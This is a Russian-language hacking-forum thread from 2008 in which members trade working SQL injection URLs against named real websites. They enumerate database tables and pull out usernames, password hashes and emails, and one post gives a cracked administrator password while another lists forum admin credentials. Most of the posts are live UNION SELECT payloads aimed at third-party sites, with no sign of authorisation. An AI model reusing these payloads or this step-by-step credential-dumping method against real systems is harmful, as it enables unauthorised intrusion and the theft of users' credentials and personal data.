Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Запрос из базы только Лимитом(!!!) Попробовал вывести всё... опера всю оперативу скушала...
     
  2. JoN.SmiT

    JoN.SmiT New Member

    Joined:
    7 May 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    -1
    (= ведь это журнал! там новерное одана таблица те оперу села какя нить пост с кучей новостей типа архива или ещё чё нить!
    А вот например как мне просканить на таблицу юзер?
     
  3. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Велемир, терпение надо иметь, а не пытаца найти легкий путь :) В крайнем случае написать граббер если не хватает терпения 38 таблиц ручками прочекать. И это при том, что первые 16 - системные :)
     
  4. JoN.SmiT

    JoN.SmiT New Member

    Joined:
    7 May 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    -1
    А чёза это кмс?

    и как Лимитом запос мутить?
     
    #2364 JoN.SmiT, 16 Jun 2008
    Last edited by a moderator: 16 Jun 2008
  5. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Там есть таблица be_users. В ней поля:
    -uid
    -pid
    -tstamp
    -username
    -password
    -admin
    -usergroup
    -email
    И ещё до*** и больше. Вот и вытаскивай.
     
    1 person likes this.
  6. JoN.SmiT

    JoN.SmiT New Member

    Joined:
    7 May 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    -1
    Покажи запрос плиз
    что после http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/*
    http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+infor%20mation_schema.tables+limit+38,1/* делал мне для себя надо знать
    и как тащить и я вас больше не потревожу! в формате http:// к примеру username плиз оч надо для обучения!
     
    #2366 JoN.SmiT, 16 Jun 2008
    Last edited: 16 Jun 2008
  7. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    На форум
    Логин Administrator
    Пароль simbol
    Есть админка, но в какой таблице пароли хз

    Вот тебе запрос для вывода данных юзеров из форума
    http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555,666+from+forum_users/*
     
    1 person likes this.
  8. JoN.SmiT

    JoN.SmiT New Member

    Joined:
    7 May 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    -1
    а в нём http://wow.alania.net/ такое проканает?
     
  9. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Проканает ;)
    http://wow.alania.net/gilds.php?guid=-3+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*
     
    1 person likes this.
  10. JoN.SmiT

    JoN.SmiT New Member

    Joined:
    7 May 2008
    Messages:
    9
    Likes Received:
    0
    Reputations:
    -1
    значит сейчас нада писать вот так
    http://wow.alania.net/gilds.php?guid=-3+union+select+111,222,username,user_password/*
     
  11. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Сейчас нужно идти вот сюда
    http://forum.antichat.ru/showthread.php?t=19605
    и ЧИТАТЬ ЧИТАТЬ ЧИТАТЬ
    а иначе всегда будут подобные вопросы.... вот чесно, сам подумай ОТКУДА ТЫ взял что там есть эти поля и ИЗ КАКОЙ таблицы ты выводишь :)
    Удачи!
     
  12. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Давайте все-таки в этой теме задавать вопросы, а не бредовать на тему сделайте мне скуль иньекцию. Здесь могут помочь в нестандартном\непонятном случае, но забивать тему элементарными вопросами сто раз расписанными в статьях не стоит. Буду удалять
     
    1 person likes this.
  13. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    _http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+limit+0,1/*

    Константинэ... только не ругай меня... :)
    P.S Не могу уснуть...
     
    #2373 Ch3ck, 16 Jun 2008
    Last edited: 16 Jun 2008
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    JoN.SmiT не падай в минуса..) читай ману.

    еще чтот разкрутил..
    administrator:d9d1b168eac8f197e0576b56cfc23ece => gfhjkm

    administrator;password

    Есть скуля в поле login, как получить аутпут?)
     
    #2374 sabe, 16 Jun 2008
    Last edited: 16 Jun 2008
  15. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+order+by+1/*
    - здесь 1 колонка

    http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+union+select+1/* - а тут пишет
    - в чем проблема? В неправильных количествах колонок? Их всего одна :)

    Хм..странно.
    Вот тут все нормально сработало:
    http://www.rciscc.uz/news.php?id=110'+union+select+1,2,3,user(),5,6,7/*
     
    #2375 Ershik, 16 Jun 2008
    Last edited: 16 Jun 2008
  16. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    в общем есть скуль:
    Code:
    http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(column_name,0x3c2f62723e)+from+information_schema.columns+where+table_name='user'/*
    но при попытке просмотра таблицы
    Code:
    http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat_ws(0x3a3a,login,password,email,0x3c2f62723e)+from+medsunr_mifegyn.user/*
    мы ничего не получаем (точнее получаем ошибку) следовательно доступ к стаблице закрыт? или я что то не так делаю...
     
  17. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    gisTy
    очень интересно... о чем пишет данная ошибка.. а так хз. пробвал конверт. тоже самое
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 gisTy таблица пустая:
    _http://www.women-medcenter.ru/index.phtml?id=-25999'+union+select+1,count(*)+from+user/*
     
  19. z3r0cool

    z3r0cool Elder - Старейшина

    Joined:
    22 Apr 2008
    Messages:
    32
    Likes Received:
    11
    Reputations:
    0
    Это обычная таблица (не VIEW), т.ч. фильтрации вывода нет.

    Записей в ней нет.



    http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(TABLE_NAME,'-',TABLE_TYPE,'-',TABLE_ROWS,0x3c2f62723e)+from+INFORMATION_SCHEMA.TABLES/*

    Хотя можно посмотреть и так.

    http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,COUNT(*)+from+medsunr_mifegyn.user/*

    Если бы небыло прав, то показало бы ошибку.
     
    #2379 z3r0cool, 16 Jun 2008
    Last edited: 16 Jun 2008
    1 person likes this.
  20. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Ershik, такая ситуация неоднократно расписывалась, объяснение в чем причина и решение проблемы - http://forum.antichat.ru/showpost.php?p=497033
     
    #2380 0nep@t0p, 16 Jun 2008
    Last edited: 16 Jun 2008
Thread Status:
Not open for further replies.